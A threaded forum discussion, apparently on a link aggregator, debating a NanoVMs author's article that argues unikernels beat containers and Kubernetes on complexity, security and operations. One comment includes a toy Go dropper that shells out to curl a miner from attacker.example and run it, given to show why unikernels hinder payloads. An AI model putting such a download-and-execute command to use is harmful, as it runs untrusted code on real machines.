1. 18

  2. 6

    I think unikernels are a really interesting and great idea; I love their simplicity over complexity approach to problem solving.

    But I’d love to have a more ingenuous discussion about them, e.g.

    This is why we keep on seeing articles like the one from AirBnb complaining that kubernetes has serious performance problems.

    This quote links to an article that, more or less, discusses how Airbnb approached the common problems of multi-tenancy the Kubernetes way. Unikernels, I assure you, have the same, similar, or even new multi-tenancy problems. And they have their own unikernel flavor of solutions.

    The takeaway from that article should not be that “Kubernetes has serious performance problems” so much as “multi-tenancy is hard and each platform has its own solutions”. It doesn’t feel like an honest takeaway and makes the rest of the writeup feel disingenuous, i.e. it lost my trust in the author’s objectivity.

    1. 1

      The whole point here is that multi-tenancy is much easier to deal with because they are deployed as vms, so they don’t have to reinvent the wheel: the scheduling and isolation problems are already resolved by the cloud providers (ergo no k8s necessary).

      If we are talking about having an ingenuous discussion can you explain why you think it would be harder?

    2. 3

      The article should probably disclose that the author is the CEO of NanoVMs, which develops the Nanos unikernel and Ops deployment tool.

      Having said that, I agree about the complexity of Kubernetes and related things. But rather than completely dump Linux inside the VM, I think I’d go with something like LinuxKit, which can build minimal, immutable Linux-based VM images, using Docker (or is it OCI) images. IMO, this achieves many of the benefits of unikernels, without throwing away the proven, mature foundation of Linux.

      1. 1

        The author profile discloses it but yes I’m at NanoVMs.

        As for the other - you are still stuck with linux then right? Why not just use a linux vm then? Cause you have all the same problems that linux has. We’re not just trying to fix container issues here. We’re trying to fix longstanding linux issues. Again, Linux is 30 years old and is largely the same as Unix. I’ve seen a lot of ‘windows 7 EOL’ lately but guess what? Windows 95 was released after Linux was. There’s an awful lot of really bad software in the FOSS world and unikernels offer the chance to start fresh and really wipe the slate clean.

        1. 7

          There’s an awful lot of really bad software in the FOSS world and unikernels offer the chance to start fresh and really wipe the slate clean.

          There’s also a lot of really good, featureful, well-debugged software in the FOSS world, including the Linux kernel. You mention the age of the kernel as if it’s a bad thing, but building upon mature technology, rather than starting over just for the sake of wiping the slate clean, is how we make progress. To put it bluntly, I have a lot more confidence in the reliability and performance of the Linux kernel than I have in your two-year-old unikernel. At the same time, using something like LinuxKit, we can drop the user-space components that really are redundant while keeping the good parts.

          1. 1

            To be clear - I’m not denying your right to your faith. :)

            For this argument it’s not really about the kernel per se - it’s the constructs it has that allow software to run rampant, and ripping that out of linux is not as easy as applying an overly restrictive seccomp profile to it. Multiple processes and all the interesting SYSV IPC stuff you can do with them is a very large chunk of code. Think about the implications that has for, say, the scheduler. Or think about how this applies to security.

            Likewise, half of linux is merely device drivers. Just last fall there was a discussion on the LKML about finally removing floppy disk support, and yet someone wanted to keep supporting it for ‘posterity’. Ripping some of this out is more political than anything else. However, some very famous and loved software projects such as postgresql (which would never fit in a unikernel) are inherently built around some of these primitives. That’s why you just can’t jettison the bathwater. At some point you have to state what you are going to keep and what you are going to throw out.

            As for userspace - that’s an entirely different mess. Case in point - try and install an interpreted language such as python or ruby or something of that nature. You’ll end up installing a half-dozen other compilers each depending on a whole legion of libraries that have been around for a few dozen years. Some like libxml (compiled into every single interpreter I know of) have a fully functioning ftp server in them - why?

      2. 3

        Overall I do like the idea of using unikernels instead of containers.

        There are several arguments in this article which don’t make sense to me.

        Unikernels Avoid Vendor Serverless Lock-In

        You could replace the word “unikernel” with “container” in this whole section and it would equally apply. I think that the author is specifically talking about poor container usage where people are running many processes instead of just one. Which, to be fair, is all too common, but that’s a different discussion altogether. You could also design bad bloated unikernels.

        Unikernels Avoid Kubernetes Complexity

        I agree with many of the points in this section criticizing the complexity of the big container orchestration tools… but again, this paragraph sounds like the author has only experienced badly crafted containers:

        Containers are notorious for eating databases alive. With unikernels, you can pause, stop, restart, and even live migrate with ease with no need to use external software to do any of this because, at the end of the day, they are still just plain old VMs, albeit specially-crafted ones.

        1. 7

          unikernels get rid of the notion of the “server” and embrace a serverless mindset. That is not to say there is no server, but it’s not one you can ssh into and install a bunch of crap

          The “bunch of crap” are crucial tools for monitoring, logging, security (e.g. HIDS), debugging (e.g. strace).

          Attackers are still equally able to attack a vulnerability in your application and inject an in-memory payload as before.

          Essentially you gave up detection and forensic capabilities.

          It’s either working or it’s not.

          Until you want to investigate an occasional glitch or performance issue that depends on any non-trivial interaction between application, kernel, drivers, firmware, hardware.

          Unikernels Avoid Kubernetes Complexity

          Also traditional UNIX processes and OS packages. Nowadays they provide very good sandboxing without the additional layers of filesystems and virtual networking.

          1. 0

            The logging/monitoring/debugging points are just flat out wrong. This gets brought up way too often and it’s just not correct. I’d appreciate it if people would stop repeating things that simply aren’t true.

            Logging works out of the box. Ship it to papertrail/elastic/splunk/whatever. Monitoring works out of the box. Newrelic, prometheus, lightstep, etc. works out of the box.
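
            For what it’s worth, a rough sketch of what “works out of the box” means here, assuming a plain Go service (the port, metric name, and handler are made up for illustration): logs just go to the process’s stdout/stderr, which the hypervisor console or whatever log shipper you point at it picks up, and metrics are exposed on a standard Prometheus endpoint that gets scraped over the VM’s network - no agent or second process inside the image.

            ```go
            // Hypothetical single-process service: logs go to stdout/stderr (captured by
            // the hypervisor console or shipped to Elastic/Papertrail/etc.) and metrics
            // are scraped over HTTP by Prometheus. No shell, agent, or extra process
            // inside the image is needed for either.
            package main

            import (
                "log"
                "net/http"

                "github.com/prometheus/client_golang/prometheus"
                "github.com/prometheus/client_golang/prometheus/promhttp"
            )

            var requests = prometheus.NewCounter(prometheus.CounterOpts{
                Name: "app_requests_total", // made-up metric name
                Help: "Total requests served.",
            })

            func main() {
                prometheus.MustRegister(requests)

                http.Handle("/metrics", promhttp.Handler()) // scraped by Prometheus
                http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
                    requests.Inc()
                    log.Printf("handled %s %s", r.Method, r.URL.Path) // plain stderr logging
                    w.Write([]byte("ok\n"))
                })

                log.Fatal(http.ListenAndServe(":8080", nil))
            }
            ```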

            HIDS? For what? You can’t log in to it - there’s no notion of users.

            As for in-memory payloads - go for it - it becomes much, much harder because you can’t spawn new processes, and at least Nanos employs ASLR and the common page protections found in Linux, so imo that becomes way harder to attack.

            As for ‘debugging’ firmware/kernel/hardware - a) none of that would be debugged in a unikernel cause it’s all virtual and b) why would you do that on a prod system? That’s the sort of work you do in a development environment - not a live system.

            1. 2

              That’s the sort of work you do in a development environment - not a live system.

              Until your repro is in a live system and the company is losing money so you need to debug it now.

              1. 1

                yeh, I’d completely disagree here - most ops people don’t code at all and frankly if you are going to “debug” “kernels, drivers, firmware, hardware” on a live prod system - that’s a firing offense in my most humble opinion

                1. 2

                  Usually, the issue is in userspace. But when downtime is costing thousands of dollars a minute, and your repro slipped past all of your testing, QA, staged rollouts, and SREs, you go into the vault, get the SSH keys, and debug wherever you can.

                  1. 1

                    I’d agree with the sentiment that it is usually in userspace 100%.

                    Thousands/min? Was this measured over the course of a week or over the course of a few hours? If over the week, why did it suddenly become a problem? If over the course of an hour, was it because of a bad deploy that could simply be rolled back?

                    Also, why would a single instance, and not more than a few servers, be causing thousands/min in damage? If it was a single instance, perhaps you can just kill that one. If it’s infectious, then that points to something non-instance-specific.

                    As someone that has had to personally deal with shitty code blowing up servers at odd hours of the night repeatedly for years, I get the feeling - I get it :). I just don’t think the practice of ssh’ing into random servers is a sustainable process anymore. Definitely not when it’s just splashing water on forest fires vs fixing the root problem.

                    1. 1

                      So, in the instance I am thinking of, someone else’s rollout changed the query being sent to our service, which broke accounting for a significant portion of the ads served by YouTube.

              2. 1

                You cannot possibly instrument/log every parameter to every function in both user and kernel space for every call. It is way, way too expensive. The same thing goes for per-processor utilisation with subsecond resolution. It has to be done in a targeted way, when it is required.

                I feel like people who object against live diagnostics have never heard of perf and BPF, or at least not used them to solve hard problems.

                Centralised collection of metrics is great for discovering trends and forecasting. It is not of sufficient resolution to diagnose issues in production.
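
                To give a concrete (if language-specific) flavor of that targeted, only-when-needed approach - this isn’t perf or BPF, just the same idea using Go’s net/http/pprof, with a made-up listen address: nothing is collected until someone explicitly requests a profile from the live process.

                ```go
                // Sketch of on-demand live diagnostics in the same spirit as perf/BPF:
                // the profiling endpoints sit idle until a profile is explicitly requested.
                package main

                import (
                    "log"
                    "net/http"
                    _ "net/http/pprof" // registers /debug/pprof/* on http.DefaultServeMux
                )

                func main() {
                    // Expose profiling on a separate, non-public address (made up here).
                    // When an issue shows up in production, grab a 30s CPU profile with:
                    //   go tool pprof http://10.0.0.5:6060/debug/pprof/profile?seconds=30
                    // and pay the overhead only for those 30 seconds.
                    log.Fatal(http.ListenAndServe("10.0.0.5:6060", nil))
                }
                ```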

                1. 1

                  We’ve heard. :)

                  Nanos even has support for both ftrace-like ( https://github.com/nanovms/nanos/tree/master/tools/trace-utilities ) and strace-like functionality.

                  I still hold to the case that if you are resorting to running something like perf in prod, you’ve failed to instrument or profile your application beforehand. The author explicitly warns in the docs that you might want to test it before using it in production, as it has had bugs resulting in kernel panics in the past. Many of the problems that people “can’t replicate” in a dev/test environment actually can be and should be.

              3. 0

                The “bunch of crap” are crucial tools for monitoring, logging, security (e.g. HIDS), debugging (e.g. strace).

                Even though I agree this is typically the case, this is not the way “DevOps” is supposed to work. Containers should not have all this stuff in them either. Containers should run 1 process. They can’t always work this way without rewriting a program, but we should strive for that.

                Attackers are still equally able to attack a vulnerability in your application and inject an in-memory payload as before.

                Yes, but the attack surface is greatly reduced.

                Also traditional UNIX processes and OS packages. Nowadays they provide very good sandboxing without the additional layers of filesystems and virtual networking.

                I can’t help but largely agree with this. However, there are many benefits to the application isolation from VMs, unikernels, and containers, which allow for sysadmin models that are not possible with just processes and packages on a single host.

                1. 4

                  So if a container should only run 1 process, what’s the difference between a container and a statically linked program running in a jail?

                  1. 1

                    Containers should not have all this stuff in them either. Containers should run 1 process.

                    Indeed. All the tooling is on the base OS and often works in roughly the same way against normal unix processes and containers.

                    Attackers are still equally able to attack a vulnerability in your application and inject an in-memory payload as before.

                    Yes, but the attack surface is greatly reduced.

                    Not if you consider the point above. The application is still the same codebase (regardless if it’s running as a sandboxed process, a container and so on). You still have to either deploy and run all the ancillary tooling at some point in the stack or have unmanaged black boxes around.

                    1. 0

                      The reduction in attack surface, while true, is not the main security selling point imo. It’s the fact that most common exploits wish to execute other programs, usually many others. If I want to take advantage of your weak wordpress setup and install a cryptominer, not only is it a different program - it’s probably not written in php, and thus I won’t be able to install it in a unikernel environment and run it. I’m forced to inject my payload in-memory as you state, and that makes things rather hard very, very fast. Most payloads simply try to exec /bin/sh as fast as possible. Can you code a cryptominer with ROP alone? Can you code a mysql client with ROP alone?

                      I’d love to see this.
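
                      To make the “most payloads just exec something” point concrete, here’s a toy sketch (the host, paths, and miner name are invented) of what a typical post-exploitation dropper boils down to; every step assumes a shell, a filesystem full of other programs, and the ability to spawn processes - none of which exist in a single-process unikernel image.

                      ```go
                      // Toy illustration of what a typical dropper does after gaining code
                      // execution. Each step relies on facilities a single-process unikernel
                      // image doesn't have: no /bin/sh, no curl, no second program to exec.
                      package main

                      import (
                          "log"
                          "os/exec"
                      )

                      func main() {
                          // 1. Spawn a shell (the classic first move of most payloads).
                          // 2. Use it to fetch and run some other binary, e.g. a cryptominer.
                          // Host, path, and binary name below are made up for illustration.
                          cmd := exec.Command("/bin/sh", "-c",
                              "curl -s http://attacker.example/miner -o /tmp/miner && /tmp/miner")
                          if err := cmd.Run(); err != nil {
                              // On a single-process image this is where the attack stops:
                              // there is nothing to exec and no way to spawn it.
                              log.Fatalf("no shell, no exec: %v", err)
                          }
                      }
                      ```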

                2. 0
                  • Your argument here doesn’t match the header you pasted (serverless) - so not sure what you are trying to point out here - the security side of things or serverless lock-in? If you can elaborate I can help provide pointers. If it’s the security side of things - the fact that it is single process by architectural design deals a pretty hefty blow to all the malware found in containers today like the stuff mentioned in https://unit42.paloaltonetworks.com/graboid-first-ever-cryptojacking-worm-found-in-images-on-docker-hub/ . Otherwise, that header is about serverless offerings like lambda or google cloud run.

                  • There’s quite a lot of “orchestration” tooling that is arguably necessary in the container ecosystem precisely because they insist on duplicating networking/disk on top of existing virtualization. The point I was trying to make here was that since at the end of the day these are virtual machines - you get all that “orchestration” for free. Make sense?

                  1. 1

                    From Unikernels Avoid Vendor Serverless Lock-In

                    However, unlike most serverless offerings that are entirely proprietary to each individual public cloud provider, unikernels stand apart because instead of some half-baked CGI process that is different from provider to provider, they assume the basic unit of compute is a VM that can be shuttled from one cloud to the next and the cloud provider is only responsible from the virtual machine down.

                    I don’t understand how this is unique to unikernels. You can shuttle containers from one server (or cloud provider) to the next.

                    Security- Yes, containers and their tooling are terrible here. Unikernels, especially well designed unikernels really shine in this regard.

                    There’s quite a lot of “orchestration” tooling that is arguably necessary in the container ecosystem precisely because they insist on duplicating networking/disk on top of existing virtualization. The point I was trying to make here was that since at the end of the day these are virtual machines - you get all that “orchestration” for free. Make sense?

                    Ok I think I’m getting your perspective now. You’re assuming the container orchestration software is running inside of VMs managed in turn by VM orchestration software. More abstraction, more code, more attack surface, more problems. Totally agree here, if I’ve got it right now. Maybe you could spell it out a bit more at the start of the article, even though it’s quite clear now on re-read once I’ve already grabbed onto the perspective.

                    As an aside, container orchestration software could run directly on a hypervisor, and that’s where things seem to be moving to in the cloud-native industry. Which is going to be… exciting, from a security perspective.

                    1. 2
                      • afaik live migration is still not a production-quality feature for containers, although it has existed in the vm world for over a decade now? And the container ecosystem has invented an entire language to describe the whole concept of persistence, which is trivial in vms and non-trivial in containers - but this section wasn’t really taking aim at containers

                      • yeh - the security argument wasn’t really for that - it’s the fact that if you are spinning up a k8s stack on gcloud or aws you are inherently already on top of an existing vm stack, and there’s a ton of duplication going on here which makes no sense from a performance or complexity standpoint. The security arguments are a bit different. As far as containers on a hypervisor go - I know kube-virt is there and I see this concept talked about a lot on twitter, but I don’t see much movement there. Regardless, that’s essentially just stuffing a linux inside of a vm and using the container mechanisms for orchestration. Part of the security story here is not just ‘containers suck at security’ - it’s deeper than that - it’s the fact that linux is ~30 years old and was built in a time before heavy commercialized virtualization (ala vmware) and before the “cloud” - these two abstractions give us a chance to deal with long-standing architectural issues of the general purpose operating system

                      1. 1

                        Regarding live migration, isn’t it rare for public cloud providers to actually support this?

                        1. 1

                          That’s not a primitive that they traditionally expose as-is, you are correct. To do so in a free-for-all environment would probably have some serious security/scheduling ramifications; however, you see it pop up in quite a few places regardless. For instance, if you boot a database on google cloud right now, give it say 8 gig, and insert a few hundred thousand rows, you can instantly upgrade that database to 16 gig or 32 gig of ram without it actually going down. Behind the scenes they are spinning up a new vm, transparently migrating page by page to the new vm without destroying the live database, and then shutting down the old vm. AWS also uses it to migrate vms off faulty hardware.

                          Of course in private cloud situations this is routinely used for backup/DR.

                          This is all to say that there are many many features that are simply not possible under a container paradigm.

                        2. 1

                          it’s the fact that linux is ~30 years old and was built in a time before heavy commercialized virtualization (ala vmware) and before the “cloud”

                          What’s the connection? UNIX is older; virtualization has existed since the 1960s and hardware virtualization since the 1970s.

                          1. 2

                            The keyword here being “commercialized virtualization”. We are talking about ESX from VMWare here. Anyone using large sets of servers in north america and not using AWS (api on kvm/xen) or Google Cloud (api on kvm) is using xen from Citrix or esx from VMWare.

                            We didn’t have this style of offering in the 90s. Everyone had to use real servers and actually use the unixisms of multiple processes with multiple users on the same box. You’d pop into a sun box and use commands like who and see a half dozen users. You could be the BOFH and wall them a message stating you were kicking them off.

                            Times have changed. Because we not only have access to virtualization in private datacenters but also entire APIs against the ‘cloud’, we can finally drop the chains that have existed in unix land for so long and solve a lot of the problems that exist, like performance and security.

                            1. 1

                              Isn’t making Linux better suited to virtualization one of the motivations for systemd?

                              1. 2

                                When I say virtualization I’m speaking about classical machine level virtualization not carving up a linux system with namespaces. The OSTEP book, while one of the more accessible books on operating systems, uses virtualization in a very liberal sense. Ever since then we’ve seen the containerati abuse the term as well and this is where the confusion sets in.

                                Machine level virtualization has actual hardware capabilities to carve up the iron underneath. Machine level virtualization doesn’t care what the operating system is (linux, macos, windows, etc.); systemd otoh is clearly linux only (and a very specific set of linux at that). In fact, today’s virtualization (vs that of 2001) is so sophisticated, with things like passthrough and nic multiplexing, that it’s possible to run vms faster than an average linux on the hardware itself - that’s how good it is today.

                                That is why I’m very hesitant to label namespaces and their friends ‘virtualization’. To me that’s a very different thing.

                                1. 1

                                  Thanks for taking the time to clarify!

                              2. 1

                                Is there also an implication with “Linux is 30 years old” that Linux has not been developed since its inception? That something is old is not an automatic disqualification if it has active development.

                                1. 3

                                  It’s not about the age. It’s the fact that the environment has changed and core concepts are not appropriate anymore. We had to use operating systems that supported multiple processes by multiple users in the 90s. Linus’ computer was a 286/386 in 93. We didn’t have commercialized virtualization or the cloud. Back in the 70s when the concept was delivered originally in Unix they were using computers like the pdp-7 and pdp-11 that took up entire walls and cost half a million dollars. Clearly back then that architecture had to be that way.

                                  Contrast/compare today when even small 20 person companies can be using tens or even hundreds of vms because they have so much software. We need not mention the big players that pay AWS hundreds of millions of dollars/year or banks that wholly own entire sets of datacenters completely virtualized.

                                    So it’s not the fact that linux is 30 years old or unix is 50 years old - it’s the concept of being able to, say, run a database and a webserver on the same machine, or the fact that you even want the concept of an interactive ‘user’ when you have a fleet of thousands of vms. Most people’s databases don’t even fit on a single machine anymore, and a lot of their web services don’t either - anyone with a load balancer can show you that. We’ve consumed so much software that the operating system has largely inverted itself, yet we are still using the same architecture that was designed for a completely different time period, and it’s not something you can just yank out or seccomp away.

                                  1. 2

                                    That’s a very interesting perspective. Thanks for explaining in greater detail!

                    2. 2

                      This is a tangent brought on by the video link in that post… but damn, I miss xtranormal. Is there anything similar around these days?

                      1. 1

                        I think it’s still around.

                        1. 1

                          Nice. It looks like someone has revived it, though it no longer has any kind of free version. It had gone away completely for a while.

                      2. 1

                        are rumpkernels dead? at least the website isn’t resolving anymore.

                        1. 1

                          Last word is that Antti took up brewing beer.

                          1. 1

                            good for him i guess :)

                            1. 1

                              That reminds me, I’m curious about why you chose to write your own unikernel rather than continuing his work. With the latter approach, you’d have the solid foundation of NetBSD’s drivers and TCP/IP stack, while keeping the advantages of unikernels.

                              1. 1

                                Half of the tcp/ip stack has been temporarily borrowed from LWIP (although there’s a very high chance it will be replaced in the next year, depending on time/resources).

                                Drivers are actually a non-issue if you presume that things will only be deployed in a vm (we have 0% intention to run on real hardware - it’s a part of the architectural model). Then you just need to support the disk, network, clock, etc. and those we obviously re-use for whatever the hypervisor is.

                                It also might help that Antti had no intention of making a ‘unikernel’. His thesis revolved around how one could debug/switch out/fix drivers in a live system.

                                Lastly, we saw early on that forcing people to re-compile software they didn’t write was a non-starter.

                                1. 1

                                  I agree with you that being able to use existing binaries compiled for Linux is a very useful feature. So rumprun certainly isn’t the full solution. I also understand that you don’t need a large selection of drivers. But having NetBSD’s TCP/IP stack and filesystem, if nothing else, would have been useful, right? You could then have implemented Linux emulation on top of that. So I wonder if you considered that approach, and if so, why you rejected it. Alternatively, did you consider building on OSv? I’m sure that what you want to sell isn’t the kernel per se, but higher-level tools on top of it. So why not build on existing work?

                                  1. 1

                                    Not as useful as you might think. Whatever you port you have to support.

                                    Emulating linux from bsd would be an entirely different ballgame that we don’t wish to expend resources on. Building a systems company is a bit different from building a SaaS company. First off, it’s not ‘super hot’ and second it takes a long time (engineering years) to get even the smallest stuff going. There’s this idea of innovation tokens and you can only spend so many at a time.

                                    Also, why would we build on dead (or not financially enabled) projects that we don’t control?

                                  2. 1

                                    Drivers are actually a non-issue if you presume that things will only be deployed in a vm (we have 0% intention to run on real hardware - it’s a part of the architectural model). Then you just need to support the disk, network, clock, etc. and those we obviously re-use for whatever the hypervisor is.

                                    i think a really interesting use case for unikernels is cheap arm boards though. if you have the whole system for yourself, a $15 board might go a long way.

                                    1. 1

                                      agreed, espc w/the confluence of 5g/ML/edge - nanos doesn’t do ARM today but it might in the future, wink wink nudge nudge

                                      edit: i might’ve responded too fast - even if we support ARM in the future it’d still be only as a vm - not flashing the device (we’re def. not the only ones that think this way)